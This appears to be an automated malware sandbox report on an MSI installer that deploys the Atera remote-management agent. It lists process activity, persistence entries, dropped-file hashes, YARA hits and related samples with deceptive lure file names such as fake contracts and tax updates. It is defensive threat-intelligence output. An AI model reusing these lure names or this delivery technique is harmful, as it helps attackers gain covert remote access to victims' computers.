• Skipping network analysis since amount of network traffic is too extensive
Time | Type | Description
06:58:03 | API Interceptor | 3x Sleep call for process: rundll32.exe modified
06:58:07 | API Interceptor | 1984x Sleep call for process: AteraAgent.exe modified
06:58:23 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
06:58:31 | API Interceptor | 32x Sleep call for process: AgentPackageAgentInformation.exe modified
06:58:35 | API Interceptor | 27x Sleep call for process: powershell.exe modified
06:58:36 | API Interceptor | 1008x Sleep call for process: AgentPackageSTRemote.exe modified
06:58:39 | API Interceptor | 37x Sleep call for process: AgentPackageMonitoring.exe modified
06:59:14 | API Interceptor | 751x Sleep call for process: AgentPackageTicketing.exe modified
06:59:15 | API Interceptor | 149x Sleep call for process: AgentPackageProgramManagement.exe modified
06:59:22 | API Interceptor | 2x Sleep call for process: AgentPackageSystemTools.exe modified
06:59:48 | API Interceptor | 7x Sleep call for process: AgentPackageUpgradeAgent.exe modified
11:59:09 | Task Scheduler | Run new task: Monitoring Recovery path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe s>schedulerrun
12:00:46 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {e883dae5-a63d-4a45-afb9-257f64d5a59b} "C:\ProgramData\Package Cache\{e883dae5-a63d-4a45-afb9-257f64d5a59b}\dotnet-runtime-8.0.11-win-x64.exe" /burn.runonce
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        40.119.152.2416CWcISKhf1.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                          setup.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                            Documento_Contrato_Seguro_18951492.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                              Documento_Contrato_Seguro_25105476.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                Documento_Contrato_Seguro_63452319.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                  Documento_Contrato_Seguro_44600862.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                    setup.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      Atualizador_Fiscal_NFe_37882912.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                        Infraccion-Multa.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                          setup (1).msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                            35.157.63.227BOMB-762.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                              kTbv9ZA2x0.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                IwmwOaVHnd.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                  e8gTT6OTKZ.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                    laudovisitabombeirosPdf.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                      Adobeflash.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                        setup_north_west_arctic_borrough.msiGet hashmaliciousAteraAgentBrowse
SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msi | malicious | AteraAgent
setup_it_security (1).msi | malicious | AteraAgent
SecuriteInfo.com.Program.RemoteAdminNET.1.1711.8851.msi | malicious | AteraAgent
13.35.58.89
IwmwOaVHnd.msi | malicious | AteraAgent
Atualizador_Fiscal_NFe.msi | malicious | AteraAgent
SecuriteInfo.com.Program.RemoteAdminNET.1.4447.28224.msi | malicious | AteraAgent
Arquivo_4593167.msi | malicious | AteraAgent
ALVARA-072.msi | malicious | AteraAgent
TRABALHO----PROCESSO0014S55-S440000000S1.msi | malicious | AteraAgent
SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi | malicious | AteraAgent
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context
No context

Process: C:\Windows\System32\msiexec.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 145968
Entropy (8bit): 5.874150428357998
Encrypted: false
SSDEEP: 3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
MD5: 477293F80461713D51A98A24023D45E8
SHA1: E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
SHA-256: A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
SHA-512: 23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 26%
• Antivirus: Virustotal, Detection: 28%
Reputation: unknown

Process: C:\Windows\System32\msiexec.exe
File Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1442
Entropy (8bit): 5.076953226383825
Encrypted: false
SSDEEP: 24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
MD5: B3BB71F9BB4DE4236C26578A8FAE2DCD
SHA1: 1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
SHA-256: E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                                              SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215088
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                              MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                              SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                              SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                              SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                              MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                              SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                              SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                              SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):602672
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                              MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                              SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                              SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                              SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                              MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                              SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                              SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                              SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3318832
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                              MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                              SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                              SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                              SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8853
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.668195954464292
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:4jexz1ccbTOOeMeYu61Q7r6IHfQ7r6kAVv70HVotBVeZEmzmYpLAV77kXpY92r:4yD2M0p0tiB2iQ
                                                                                                                                                                                                                                                                                              MD5:63FA79924E430C38330CDD2DFF90F10F
                                                                                                                                                                                                                                                                                              SHA1:6784C54E39C954F5E5562816E4E9868822F9C619
                                                                                                                                                                                                                                                                                              SHA-256:F43E9DAB9B53637B44023D3BE5E941456FD816DB1CEEEBEC2E4D4BF20CB52407
                                                                                                                                                                                                                                                                                              SHA-512:6B31BB4C68959AD5F14A0DF995925F45DBE852D6DD4A5291AFD5C1EFB22A967BAD4BFBDB46E6B534F0881903421CB47EAAB7E6011B91A65CE8950E2F4B71407B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\692c42.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@C7&Z.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent".APLICATIVO-WINDOWS-NOTA-FISCAL.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@.
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9519
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.57476219348133
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:ojeGQcRRbLCsgRRbLCMDp17qEVl0QRLALtyD0qagukGGhaKfmbHt1fCqk4rEcZ:oyYRlgRld7KKLqlT
                                                                                                                                                                                                                                                                                              MD5:DEFFA740EDF9B1E56FAEBFE6FA07C805
                                                                                                                                                                                                                                                                                              SHA1:5EEBF479685060A1819AA673B35A34683F52E0C1
                                                                                                                                                                                                                                                                                              SHA-256:E975CC608E6B40C7898DD59C74058A8C08DBBBE1A87E59A9CD11E77D46D62631
                                                                                                                                                                                                                                                                                              SHA-512:410E287B8979A79CEE85BD4D6E8E6D829BF71D83F58F03BD5F3657B843A7A934E6195F523E466FB60342AE2FD08A76D4C91947104FB7B4EDB27EA948603E111C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\692c47.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@s7&Z.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent".APLICATIVO-WINDOWS-NOTA-FISCAL.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....InstallInitialize$..@....z.Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7D0A237E2F2A7564CA141B792446E854\Transforms...@....(.$..@....@.Software\Microsoft\Windows\CurrentVersion\Installer\TempPackages...@....(.&...C:\Windows\Installer\692c43.msi..#0$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7D0A237E2F2A7564CA141B792446E854\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ................@....%...AuthorizedCDFPrefix%...Comments%...Contact%...DisplayVersion..1.8.7.2
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8767
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.653216214534311
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:ny7wo+fncHMes1j6ITj6k7s5VNpkxYpLso:nPo+fncHIjVjtSNpkcP
                                                                                                                                                                                                                                                                                              MD5:F0990B56F9DB80DB07CA0AB09F8714EA
                                                                                                                                                                                                                                                                                              SHA1:0025E14A649293A27454DBDE256249EBB367D143
                                                                                                                                                                                                                                                                                              SHA-256:32EF3744EAD9F3BEC84E826978B78E8EC88E0A3AB9C38B4F974873BA12945293
                                                                                                                                                                                                                                                                                              SHA-512:DD060520966EE5E45DCAC3E3323C1AC49BF925AC2EA23959331549B13C6B23E22C994115EACF2FAB07CB82BF766EE23FC01D876F230E92F84F3EB3A0AB4DCBD6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\692c4f.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@w7&Z.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):753
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                                                                              MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                                                                              SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                                                                              SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                                                                              SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7466
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                                                                              MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                                                                              SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                                                                              SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                                                                              SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145968
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                                              MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                                              SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                                              SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1442
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                                              MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                                              SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                                              SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
